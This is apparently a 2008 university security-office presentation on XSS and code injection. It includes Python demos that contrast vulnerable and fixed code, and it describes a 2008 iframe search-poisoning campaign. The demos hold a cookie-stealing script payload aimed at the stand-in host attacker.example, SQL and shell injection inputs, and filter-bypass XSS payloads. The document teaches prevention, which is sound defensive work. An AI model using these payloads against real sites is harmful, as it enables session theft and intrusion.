Post on 02-Nov-2014
XSS Vulnerabilities and Code Injection
Adam Curtis - ITU Security and Projects Office
5/1/2008 / SALT Meeting
Author, Another Presentation Title
Outline
1 Introduction
    What is XSS?
    Code Injection
2 Recent Activity
3 Prevention
What is XSS?
XSS is the abbreviation for Cross-site Scripting. XSS is a security vulnerability in web applications that lets an attacker inject script into pages the application serves to other users. The injected script runs in the victim's browser with the same privileges the browser grants the vulnerable site itself (the same origin), so it can read that site's cookies and DOM and act on the site as the victim. Hence the term "cross-site": another party's code runs as the host site.
Why is this bad?
It bypasses the browser's same-origin restrictions, allowing for:
- Session hijacking (the script reads the victim's session cookie and sends it to the attacker)
- Account hijacking
- Malware being silently downloaded and installed (a drive-by download)
- And more!
Because the vulnerability is so easy to introduce and so easy to exploit, it is found even in major (trusted) sites:
- Search engines
- Online stores
- Recently... GMU!
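As an added example (not code from the slides or from the author), here is the reflected XSS pattern the two slides above describe, in Python: a handler that echoes a request parameter straight into the page, the same handler with output encoding, and a small checker that counts script elements and on* event-handler attributes in the rendered result. The handler names, the attacker host attacker.example and the cookie-stealing payload are all assumptions constructed for the demo.

```python
# Added example (not from the original slides): a reflected XSS bug and its fix.
# Handler names, the attacker host and the payload are hypothetical.
import html
from html.parser import HTMLParser

# Constructed attacker payload: the session-hijacking case from the slide.
# It ships the victim's cookies to a host the attacker controls.
PAYLOAD = ("<script>new Image().src='http://attacker.example/c?'"
           "+encodeURIComponent(document.cookie)</script>")


def render_greeting_vulnerable(name: str) -> str:
    """Echoes the request parameter straight into the page (the bug)."""
    return "<html><body><h1>Hello, " + name + "!</h1></body></html>"


def render_greeting_safe(name: str) -> str:
    """Same page, but the untrusted value is HTML-encoded for the body context.

    quote=True also encodes ' and " so the same call is safe inside a
    quoted attribute value.
    """
    return ("<html><body><h1>Hello, " + html.escape(name, quote=True)
            + "!</h1></body></html>")


class ActiveContentFinder(HTMLParser):
    """Counts <script> elements and on* event-handler attributes in markup."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0
        self.handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += sum(1 for attr, _ in attrs if attr.startswith("on"))


def active_content(markup: str) -> dict:
    """Returns how many script elements and event handlers a browser would see."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return {"scripts": finder.scripts, "handlers": finder.handlers}


if __name__ == "__main__":
    for render in (render_greeting_vulnerable, render_greeting_safe):
        page = render(PAYLOAD)
        print(render.__name__, active_content(page))
```

The encoded page still shows the attacker's text to the user, but as text: the browser never sees a start tag, so nothing executes. Note that the check is on the rendered output, which is where XSS is decided, not on the input.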
What is code injection?
Wikipedia explains this well:
“Code injection is a computer bug that is caused by processing invalid data. Code injection can be used by an attacker to introduce (or “inject”) code into a computer program to change the course of execution.”
Code injection shows up in many forms:
- HTML/Script injection (XSS)
- SQL injection
- PHP/ASP injection (untrusted data reaching an include or eval on the server)
- Shell injection (untrusted data reaching a command line)
In every case the root cause is the same: untrusted data is concatenated into a string that some interpreter (a browser, a database, a language runtime, a shell) then parses as code.
Now that we know a bit about XSS and Code Injection, let's look at some recent activity regarding them.
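As an added example (not code from the slides or from the author), two of the injection forms listed above side by side in Python: a login query built by string concatenation beside the parameterized statement the Prevention section recommends, and a command built for /bin/sh beside the argv-list form that never involves a shell. The user table, the accounts and the attacker inputs are constructed for the demo.

```python
# Added example (not from the original slides): SQL and shell injection from
# string concatenation, beside the parameterized / argv-list fixes.
# Table contents, accounts and attacker inputs are constructed for the demo.
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for a real login database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the query by concatenation, so the input can rewrite the SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterized statement: the input is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def echo_vulnerable(text: str) -> str:
    """Hands a user-built string to /bin/sh; shell metacharacters become commands."""
    return subprocess.run("echo " + text, shell=True,
                          capture_output=True, text=True).stdout


def echo_safe(text: str) -> str:
    """No shell: the argument vector goes straight to exec, so ';' is just text."""
    return subprocess.run(["echo", text],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    db = make_db()
    # Constructed attacker input: close the string and comment out the rest.
    print(login_vulnerable(db, "alice' --", "wrong"))   # logs in as alice
    print(login_safe(db, "alice' --", "wrong"))         # None
    print(repr(echo_vulnerable("hi; echo INJECTED")))   # second command ran
    print(repr(echo_safe("hi; echo INJECTED")))         # one line, literal text
```

The two fixes are the same idea: the data travels to the interpreter through a channel (bind parameters, the argv array) that it can never confuse with the code. Quoting or stripping characters in the input is not needed once that is done.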
Recent Activity
Starting at the beginning of March 2008, an exploit was discovered spreading across many of CNET's search pages and then reaching many other popular websites. The exploit combined Search Engine Optimization with cached web pages.

The attackers submitted search queries to popular sites with an iframe tag injected next to the keyword. The search pages echoed the query back into the results page without encoding it, the results pages were crawled and cached, and the poisoned queries pushed those pages up in the rankings. The iframe therefore ended up embedded in the cached copies, and when a user hits such a page the iframe's content loads without the user noticing.

The iframe redirects to the attacker's website, which serves malicious JavaScript and a download of a fake codec (the lure used to get the user to install the malware themselves).
(Comic slide, from www.xkcd.com)
Prevention
Such vulnerabilities are prevented by never letting untrusted input be parsed as code:
- In SQL, this means parameterized (prepared) statements: the input is bound as data and never spliced into the query text.
- For values rendered into HTML, it means encoding them for the context they land in (HTML body, attribute value, JavaScript string) at output time; this, not input filtering, is what actually stops XSS.
- For many input fields it also makes sense to validate, and to drop quotes, strip HTML tags, etc. where they are never legitimate (a numeric field, a username). Treat this as defence in depth: a filter that only strips known-bad patterns is easy to bypass and must not be the only control.
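As an added example (not code from the slides or from the author) of the caveat above, a blocklist filter of the "strip the script tags and drop the quotes" kind beside plain output encoding, run against two constructed payloads: one that reassembles a script tag after the filter removes the inner one, and one that never uses a script tag at all. The filter, the checker and the payloads are all constructed for the demo.

```python
# Added example (not from the original slides): why a blocklist sanitizer is
# fragile, and what output encoding does instead. Everything here is constructed.
import html
import re

# Single-pass blocklist filter of the kind the slide describes: remove
# <script>...</script> elements, then drop the quotes. Do not copy this.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def sanitize_naive(value: str) -> str:
    return SCRIPT_RE.sub("", value).replace('"', "").replace("'", "")


def encode_for_html_body(value: str) -> str:
    """Output encoding: every character with meaning in HTML is escaped."""
    return html.escape(value, quote=True)


def looks_active(markup: str) -> bool:
    """Crude check for executable content: a script start tag, or any real
    tag carrying an on* event-handler attribute. Encoded text has no '<' and
    therefore can never match."""
    lowered = markup.lower()
    return ("<script" in lowered
            or re.search(r"<\w[^>]*\son\w+\s*=", lowered) is not None)


# Constructed payloads.
# 1. The filter removes the inner <script></script> pairs, and the fragments
#    around them join up into a real <script>alert(1)</script>.
NESTED = "<scr<script></script>ipt>alert(1)</scr<script></script>ipt>"
# 2. No script tag at all: an event handler on an image that fails to load.
HANDLER = "<img src=x onerror=alert(document.cookie)>"

if __name__ == "__main__":
    for payload in (NESTED, HANDLER):
        print("naive  :", sanitize_naive(payload), looks_active(sanitize_naive(payload)))
        print("encoded:", encode_for_html_body(payload),
              looks_active(encode_for_html_body(payload)))
```

The naive filter fails in two different ways (it can be made to produce a tag it never saw, and it does not know about attributes), while the encoded output contains no tag at all, whatever the input. If a field must accept some HTML, use an allowlist HTML sanitizer that parses the markup rather than a regex over the text.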
Scanning
An extra method for prevention is to run web application scanning software against your own web pages. An excellent scanning tool is Paros, a program written in Java, available at www.parosproxy.org. (Paros is no longer maintained; OWASP ZAP, which was forked from it, is its maintained successor.) A scanner only finds the injection points it can reach, so treat its results as a check on the code fixes above, not as a replacement for them.